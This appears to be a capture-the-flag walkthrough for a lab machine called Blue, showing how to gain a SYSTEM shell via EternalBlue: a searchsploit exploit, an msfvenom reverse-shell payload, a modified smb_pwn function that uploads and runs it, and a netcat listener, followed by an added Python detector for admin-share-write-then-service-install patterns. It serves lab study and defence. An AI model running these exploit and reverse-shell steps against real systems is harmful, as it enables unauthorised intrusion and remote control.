Blue

As the name of the machine suggests, it's time to use EternalBlue to get root (SYSTEM) privileges on the box! This would be trivial with Metasploit, and even without Metasploit it isn't that hard once you pick the right exploit.

First off let's use searchsploit to find an exploit to use:

searchsploit eternalblue

There should be results like this:

[Screenshot: searchsploit results for "eternalblue"]

You could try your luck with the other ones too, but let's go with the second one:

searchsploit -m 42315.py

The exploit is now copied to the current directory. Unfortunately, some of the libraries the exploit depends on are written for Python 2, so that's what we'll use. We also need to install a couple of dependencies before running it:

pip install impacket
wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py

After installing the packages there are a few changes we need to make for this exploit to work. First, change the USERNAME and PASSWORD variables on line 36 to some arbitrary strings, since a null session is available over SMB. For example:

USERNAME = 'user'
PASSWORD = 'user'

Now we have everything ready to test the exploit. Run the script with the target's IP address:

python 42315.py <ip-address>

You should see output like this:

[Screenshot: output of the test run of 42315.py]

This is nice and all, but it doesn't help with actually rooting the machine, so let's modify the part of the script where the pwned.txt file is created and sent to the target.

First, let's generate a shell payload with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=<your-ip-address> LPORT=9005 -f exe > shell.exe

Then, replace the smb_pwn function (starting at line 914) with this:

def smb_pwn(conn, arch):
  smbConn = conn.get_smbconnection()
  smb_send_file(smbConn, 'shell.exe', 'C', '/test.exe')
  service_exec(conn, r'c:\test.exe')

The change is pretty self-evident: we upload the payload we just generated over SMB as test.exe, and then execute it.

Next, let's start our netcat listener:

nc -lnvp 9005

And finally, run the script one last time, and we have a root shell!

[Screenshot: root shell received on the netcat listener]
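The modified smb_pwn above (copy an executable to the C$ administrative share, then run it as a service) leaves a recognisable trace on the target, so here is the defender's view of the same step: an added example, not part of the original writeup or the exploit script, that correlates a remote write to an admin share with a service installation of the same file name shortly afterwards. The log layout, host name, IP addresses and service names are constructed for the example; real Windows events 5145 (share object access, which needs "Detailed File Share" auditing enabled) and 7045 (service installed) carry these fields but are exported in a different format, so the parser would need adapting.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log (NOT a real Windows event export; the layout is
# simplified to "<timestamp>|<host>|<event_id>|key=value;key=value").
# 5145 = network share object access check, 7045 = a service was installed.
SAMPLE_LOG = """\
2017-07-14T10:00:01|WIN-BLUE|5145|IpAddress=10.10.14.5;ShareName=\\\\*\\C$;RelativeTargetName=test.exe;AccessMask=0x2
2017-07-14T10:00:02|WIN-BLUE|7045|ServiceName=svc1;ImagePath=c:\\test.exe
2017-07-14T10:05:00|WIN-BLUE|5145|IpAddress=10.10.14.9;ShareName=\\\\*\\Users;RelativeTargetName=report.docx;AccessMask=0x2
2017-07-14T11:00:00|WIN-BLUE|7045|ServiceName=Spooler;ImagePath=C:\\Windows\\System32\\spoolsv.exe
2017-07-14T12:00:00|WIN-BLUE|5145|IpAddress=10.10.14.7;ShareName=\\\\*\\ADMIN$;RelativeTargetName=tool.exe;AccessMask=0x2
"""

# Administrative shares: a drive-letter share such as C$, or ADMIN$.
ADMIN_SHARE = re.compile(r'\\(?:[A-Za-z]\$|ADMIN\$)$', re.IGNORECASE)
WRITE_BIT = 0x2  # FILE_WRITE_DATA / FILE_ADD_FILE bit in the 5145 AccessMask


def parse_line(line):
    """Split one constructed log line into a dict of its fields."""
    ts, host, event_id, fields = line.split('|', 3)
    event = {'ts': datetime.fromisoformat(ts), 'host': host, 'event_id': int(event_id)}
    for pair in fields.split(';'):
        key, _, value = pair.partition('=')
        if key:
            event[key] = value
    return event


def parse_log(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def basename(path):
    """Last component of a Windows path, lower-cased, with quotes stripped."""
    return path.strip('"').replace('/', '\\').rsplit('\\', 1)[-1].lower()


def admin_share_writes(events):
    """5145 events where a remote client asked for write access on an admin share."""
    hits = []
    for e in events:
        if e['event_id'] != 5145:
            continue
        if not ADMIN_SHARE.search(e.get('ShareName', '')):
            continue
        if int(e.get('AccessMask', '0'), 16) & WRITE_BIT == 0:
            continue
        hits.append(e)
    return hits


def correlate(events, window=timedelta(seconds=60)):
    """Pair each admin-share write with a service install on the same host,
    within `window`, whose ImagePath names the file that was just written."""
    alerts = []
    writes = admin_share_writes(events)
    for svc in (e for e in events if e['event_id'] == 7045):
        image = basename(svc.get('ImagePath', ''))
        for w in writes:
            if w['host'] != svc['host']:
                continue
            if basename(w.get('RelativeTargetName', '')) != image:
                continue
            if not timedelta(0) <= svc['ts'] - w['ts'] <= window:
                continue
            alerts.append({
                'host': svc['host'],
                'remote_ip': w.get('IpAddress', '?'),
                'file': image,
                'service': svc.get('ServiceName', '?'),
                'seconds_between': (svc['ts'] - w['ts']).total_seconds(),
            })
    return alerts


if __name__ == '__main__':
    for a in correlate(parse_log(SAMPLE_LOG)):
        print('ALERT: %(remote_ip)s wrote %(file)s to an admin share on %(host)s; '
              'service %(service)s installed %(seconds_between).0fs later' % a)
```

Run on the sample, only the test.exe write followed one second later by the svc1 install is flagged: the write to the Users share is not an admin share, the Spooler entry is a normal service, and the tool.exe upload has no matching service install. The pairing deliberately keys on file name rather than on the exploit's own strings, so it covers any drop-to-admin-share-then-run-as-service pattern, not just this script.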